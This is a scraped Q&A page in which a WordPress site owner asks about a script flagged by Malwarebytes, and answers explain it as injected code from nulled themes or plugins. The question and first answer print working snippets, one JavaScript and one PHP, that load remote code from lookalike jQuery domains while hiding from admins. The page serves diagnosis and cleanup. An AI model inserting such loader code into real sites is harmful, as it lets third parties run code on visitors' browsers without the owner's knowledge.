stackoom
  简体   繁体   中英

Remove script from wordpress site

 原文  2014-06-18 09:51:42       javascript/ php/ jquery/ wordpress

Question

I am using Malware bytes and every time I visit my wordpress site it blocks a script trying to run on the page, the script is: 

<script type="text/javascript">
    if (!document.referrer || document.referrer == '') {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.min.js"></scr' + 'ipt>');
    } else {
        document.write('<scr' + 'ipt type="text/javascript" src="http://www.jquerylibs.org/jquery.js"></scr' + 'ipt>');
    }
</script>

I'm not sure if it malicious or not but I would like to remove it, however I do not know which plugin or file is causing it, i've tried looking at page source, etc.

What does the script mean and is there a way to find out what's causing it?

Any help would be greatly appreciated.

2 answers

solution1
 3  2015-01-03 00:03:09

You are using a wordpress plugin or theme that you probably downloaded from a repository of 'nulled' themes and plugins.

Almost all such websites use a business model whereby they offer premium themes and plugins which normally cost 5$-75$ for free.

But as the saying goes, there is no such thing as a free lunch. In exchange for the free plugin/theme, the website proprietor adds code which includes a js file from an outside domain which adds banners to your website.

To prevent the webmaster or developer from immediately noticing the banners (or just a back link or three), either anyone logged in as admin or/and anyone without a referrer url is not shown the advertisements.

In your case, the payload was being included from a domain which is similar to the real thing thereby fooling enough inexperienced Wordpress webmasters as something which belongs - jQuery. Official jQuery CDN is located here //code.jquery.com/

Make sure to check all themes or plugins from shady places for similar code which may also be inside image files though normally is inside init.php or functions.php. Here is another example of similar code using a different variation of jquery domain. 

if(!function_exists('wp_func_jquery')) {
        function wp_func_jquery() {
            $host = 'http://';
            $jquery = $host.'u'.'jquery.org/jquery-1.6.3.min.js';
            if (@fopen($jquery,'r')){
                echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
            }
        }
        add_action('wp_footer', 'wp_func_jquery');
    }

solution2
 0 ACCPTED  2014-06-18 09:55:36

您可以使用此问题中提出的应用程序之一在wordpress目录中搜索此脚本: 用于在不编制索引的情况下搜索文件中的字符串的工具

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question Remove script from site before being executed Script is not working in WordPress site Remove an empty script in wordpress header Remove prompt when leaving site (Wordpress) How to remove unused <b></b> tags on my Wordpress site? Moving Wordpress site and Theme stopped Jquery script? Using JS code on the WordPress site under Script My Script is not working in wordpress static site How can I run WordPress-plugin “Data Tables” on a WordPress-site and start the script from footer.php? Script to remove part of img href on a site
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM